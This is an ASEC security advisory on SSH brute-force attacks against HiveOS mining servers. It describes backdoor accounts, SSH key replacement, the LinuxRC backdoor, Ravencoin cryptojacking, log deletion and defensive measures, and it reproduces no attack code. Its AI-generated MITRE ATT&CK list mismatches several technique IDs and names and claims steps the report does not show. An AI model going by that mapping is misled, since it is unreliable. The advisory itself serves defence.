Analysis of HiveOS Attack Targeting Ravencoin Mining

Short Summary:

AhnLab Security Intelligence Center (ASEC) has identified attacks targeting improperly managed Linux servers, specifically focusing on HiveOS. Attackers exploit weak SSH credentials to gain initial access, allowing them to install backdoors and mine cryptocurrency, particularly Ravencoin.

Key Points:

• ASEC monitors attacks on Linux servers using honeypots, particularly targeting SSH services.
• Recent attacks on HiveOS involve brute force access to SSH services.
• Attackers create backdoor accounts and execute malicious scripts to install malware.
• The LinuxRC backdoor allows remote control and file operations on compromised systems.
• Malicious scripts configure HiveOS to mine Ravencoin using the GMiner software.
• Recommendations for administrators include using strong passwords, regular updates, and employing firewalls.

MITRE ATT&CK TTPs – created by AI

• Initial Access (T1078)
  • Brute Force: Attackers scan for exposed SSH services and attempt to log in using brute force methods.
• Execution (T1203)
  • Command and Scripting Interpreter: Attackers execute commands via a malicious Bash script.
• Persistence (T1053)
  • Scheduled Task/Job: Attackers register malicious scripts as services to maintain persistence.
• Privilege Escalation (T1068)
  • Exploitation of Vulnerability: Attackers exploit weaknesses in SSH configurations to gain elevated privileges.
• Defense Evasion (T1070)
  • Indicator Removal on Host: Attackers delete log files to evade detection.
• Credential Access (T1003)
  • Credential Dumping: Attackers change passwords and overwrite SSH keys to maintain access.
• Command and Control (T1071)
  • Application Layer Protocol: Attackers use SSH for command and control over the compromised system.
• Exfiltration (T1041)
  • Exfiltration Over Command and Control Channel: Attackers may exfiltrate data using the established SSH connection.

AhnLab Security intelligence Center (ASEC) is using multiple honeypots to monitor attacks targeting improperly managed Linux servers. Among the prominent honeypots is the SSH service using vulnerable credentials, which is targeted by many DDoS and CoinMiner attackers.

While monitoring numerous external attacks, ASEC recently identified an attack targeting HiveOS. The initial access targeted the improperly managed SSH service, ultimately executing commands to mine new cryptocurrency and additionally installing a LinuxRC backdoor.

1. HiveOS

HiveOS is an operating system dedicated to cryptocurrency mining, used for efficiently managing and monitoring multiple mining rigs. It can be used to automate and optimize cryptocurrency mining tasks.

Like other Linux servers, systems running HiveOS can also become targets of attacks if improperly managed. Especially when using SSH services for remote management, it becomes a target for brute force and dictionary attacks. Attacks targeting HiveOS have been ongoing for several years, with most involving the creation of SSH backdoor accounts. However, a new type of attack has recently been identified.

2. Initial Access

The attacker scanned publicly exposed SSH services and attempted to log in through brute force attacks. After successfully logging in, the following commands were executed to add a “hive” account and set a password generated using salt. Then, it downloads and executes a malicious Bash script named “run” from an external source.

3. Bash Script (run)

The initially executed “run” script is responsible for creating a backdoor account and installing additional payloads. First, it changes the passwords for the “hive” and “user” accounts using the following commands. It then overwrites the “authorized_keys” file with a new SSH public key.

Figure 1. Command for creating a backdoor account

While it is possible to use a password when logging into a Linux server using SSH, using an SSH key allows users to log in without entering a password. An SSH key pair (public/private keys) is created for this purpose. The public SSH key must be installed in the Linux server to log in. Once the public key is installed in the Linux server, the generated private key can be used afterward to log in from the client to the server without needing a password. In other words, through the above process, the threat actor would be able to use the private key created alongside the public key to log into the compromised system.

Then, a backdoor malware strain named “autofan” and a configuration file named “autofan.service” used to register it as a service are downloaded and registered to the service. Additionally, it downloads a Bash script malware strain named “nvidia-conf” responsible for mining functions and a configuration file named “overclock.service”, and registers them as a service. Once these processes are completed, it deletes multiple log files.

4. LinuxRC Backdoor

“Autofan” is a LinuxRC backdoor developed by “im_bill”, and its source code is available on GitHub. While it is not a well-known open-source backdoor, it has a history of being used alongside Mirai in a Spring4Shell attack case disclosed by China’s “360 Netlab” in 2022. [1]

Figure 3. GitHub Page of LinuxRC

LinuxRC, a simple form of backdoor, supports file browsing, downloading/uploading, command execution, and reverse shell features. The attacker can perform remote control using SSH on the compromised system, but could also use LinuxRC to easily conduct remote control, including file operations. 

Table 1. LinuxRC commands

5. Ravencoin Mining

The downloader Bash script also installed another malicious Bash code named “nvidia-conf” in addition to LinuxRC. “nvidia-conf” is responsible for configuring HiveOS’s miner to GMiner and downloading the attacker’s wallet file as follows. To note, since GMiner is already installed in HiveOS, only the wallet file is replaced. Through this, the infected HiveOS system mines the coin specified by the attacker.

Figure 5. HiveOS’s miner configuration routine

Typically, CoinMiners targeting Linux servers tend to install XMRig to mine Monero. However, the CoinMiner targeting HiveOS identified this time is characterized by mining Ravencoin. Ravencoin is a Bitcoin-based cryptocurrency and blockchain platform specialized in asset transfer and management. By checking the downloaded wallet file “wallet.conf” as follows, it is evident that KawPow is the mining algorithm for Ravencoin, as well as the mining pool address and wallet address set by the attacker.

6. Conclusion

Recently, cryptojacking attacks targeting improperly managed HiveOS servers have been occurring. HiveOS, as an operating system dedicated to cryptocurrency mining, has become a target due to its SSH server in operation using weak account information for remote management. After the initial access, the attacker manipulated the system to mine Ravencoin and also installed the LinuxRC backdoor.

Because of this, administrators should use passwords that are difficult to guess for their accounts and change them periodically to protect the Linux server from brute force attacks and dictionary attacks and update to the latest patch to prevent vulnerability attacks. Administrators should also use security programs such as firewalls for servers that are accessible from the outside to restrict access from threat actors. Lastly, caution must be practiced, updating V3 to the latest version to block malware infection in advance.

File Detection
– Downloader/BASH.Miner (2024.09.20.02)
– Backdoor/Linux.Shell.23272 (2024.09.20.02)
– Downloader/BASH.Miner.SC204555 (2024.09.20.02)
– Data/BIN.Config (2024.10.06.03)

Source : https://asec.ahnlab.com/en/83857/